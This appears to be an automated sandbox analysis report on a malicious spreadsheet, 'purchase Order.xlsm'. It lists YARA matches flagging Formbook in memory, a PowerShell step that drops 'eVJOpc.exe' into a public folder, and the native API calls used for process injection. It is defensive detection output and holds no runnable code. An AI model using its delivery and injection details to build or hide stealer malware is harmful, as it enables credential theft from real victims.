Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Found detection on Joe Sandbox Cloud Basic with higher score
Source: purchase Order.xlsm Joe Sandbox Cloud Basic: Detection: malicious Score: 64
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\eVJOpc.exe
Yara signature match
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 8_2_004030FB
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 03365720 appears 44 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 032DB150 appears 177 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0332D08C appears 45 times
Source: C:\Users\Public\eVJOpc.exe Code function: String function: 0041A4B0 appears 40 times
Source: C:\Users\Public\eVJOpc.exe Code function: String function: 00B4B150 appears 45 times
Contains functionality to call native functions
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004185D0 NtCreateFile, 9_2_004185D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00418680 NtReadFile, 9_2_00418680
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00418700 NtClose, 9_2_00418700
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004187B0 NtAllocateVirtualMemory, 9_2_004187B0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004186FA NtClose, 9_2_004186FA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004187AB NtAllocateVirtualMemory, 9_2_004187AB
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B898F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_00B898F0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00B89860
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89840 NtDelayExecution,LdrInitializeThunk, 9_2_00B89840
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B899A0 NtCreateSection,LdrInitializeThunk, 9_2_00B899A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00B89910
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A20 NtResumeThread,LdrInitializeThunk, 9_2_00B89A20
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_00B89A00
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A50 NtCreateFile,LdrInitializeThunk, 9_2_00B89A50
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B895D0 NtClose,LdrInitializeThunk, 9_2_00B895D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89540 NtReadFile,LdrInitializeThunk, 9_2_00B89540
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B896E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00B896E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00B89660
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B897A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_00B897A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89780 NtMapViewOfSection,LdrInitializeThunk, 9_2_00B89780
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89FE0 NtCreateMutant,LdrInitializeThunk, 9_2_00B89FE0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89710 NtQueryInformationToken,LdrInitializeThunk, 9_2_00B89710
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B898A0 NtWriteVirtualMemory, 9_2_00B898A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89820 NtEnumerateKey, 9_2_00B89820
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8B040 NtSuspendThread, 9_2_00B8B040
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B899D0 NtCreateProcessEx, 9_2_00B899D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89950 NtQueueApcThread, 9_2_00B89950
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A80 NtOpenDirectoryObject, 9_2_00B89A80
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A10 NtQuerySection, 9_2_00B89A10
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8A3B0 NtGetContextThread, 9_2_00B8A3B0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89B00 NtSetValueKey, 9_2_00B89B00
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B895F0 NtQueryInformationFile, 9_2_00B895F0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8AD30 NtSetContextThread, 9_2_00B8AD30
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89520 NtWaitForSingleObject, 9_2_00B89520
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89560 NtWriteFile, 9_2_00B89560
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B896D0 NtCreateKey, 9_2_00B896D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89610 NtEnumerateValueKey, 9_2_00B89610
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89670 NtQueryInformationProcess, 9_2_00B89670
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89650 NtQueryValueKey, 9_2_00B89650
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89730 NtQueryVirtualMemory, 9_2_00B89730
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8A710 NtOpenProcessToken, 9_2_00B8A710
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89770 NtSetInformationFile, 9_2_00B89770
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8A770 NtOpenThread, 9_2_00B8A770
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89760 NtOpenProcess, 9_2_00B89760
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004185D0 NtCreateFile, 9_1_004185D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00418680 NtReadFile, 9_1_00418680
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00418700 NtClose, 9_1_00418700
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004187B0 NtAllocateVirtualMemory, 9_1_004187B0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004186FA NtClose, 9_1_004186FA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004187AB NtAllocateVirtualMemory, 9_1_004187AB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A50 NtCreateFile,LdrInitializeThunk, 19_2_03319A50
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_03319910
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_03319860
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319FE0 NtCreateMutant,LdrInitializeThunk, 19_2_03319FE0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_03319660
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033196E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_033196E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319540 NtReadFile,LdrInitializeThunk, 19_2_03319540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033195D0 NtClose,LdrInitializeThunk, 19_2_033195D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319B00 NtSetValueKey, 19_2_03319B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331A3B0 NtGetContextThread, 19_2_0331A3B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A20 NtResumeThread, 19_2_03319A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A10 NtQuerySection, 19_2_03319A10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A00 NtProtectVirtualMemory, 19_2_03319A00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319A80 NtOpenDirectoryObject, 19_2_03319A80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319950 NtQueueApcThread, 19_2_03319950
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033199A0 NtCreateSection, 19_2_033199A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033199D0 NtCreateProcessEx, 19_2_033199D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319820 NtEnumerateKey, 19_2_03319820
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331B040 NtSuspendThread, 19_2_0331B040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319840 NtDelayExecution, 19_2_03319840
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033198A0 NtWriteVirtualMemory, 19_2_033198A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033198F0 NtReadVirtualMemory, 19_2_033198F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319730 NtQueryVirtualMemory, 19_2_03319730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331A710 NtOpenProcessToken, 19_2_0331A710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319710 NtQueryInformationToken, 19_2_03319710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331A770 NtOpenThread, 19_2_0331A770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319770 NtSetInformationFile, 19_2_03319770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319760 NtOpenProcess, 19_2_03319760
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033197A0 NtUnmapViewOfSection, 19_2_033197A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319780 NtMapViewOfSection, 19_2_03319780
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319610 NtEnumerateValueKey, 19_2_03319610
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319670 NtQueryInformationProcess, 19_2_03319670
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319650 NtQueryValueKey, 19_2_03319650
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033196D0 NtCreateKey, 19_2_033196D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331AD30 NtSetContextThread, 19_2_0331AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319520 NtWaitForSingleObject, 19_2_03319520
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03319560 NtWriteFile, 19_2_03319560
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033195F0 NtQueryInformationFile, 19_2_033195F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C85D0 NtCreateFile, 19_2_009C85D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C8680 NtReadFile, 19_2_009C8680
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C87B0 NtAllocateVirtualMemory, 19_2_009C87B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C8700 NtClose, 19_2_009C8700
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C86FA NtClose, 19_2_009C86FA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009C87AB NtAllocateVirtualMemory, 19_2_009C87AB
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\wlanext.exe Process Stats: CPU usage > 98%
Dropped file seen in connection with other malware
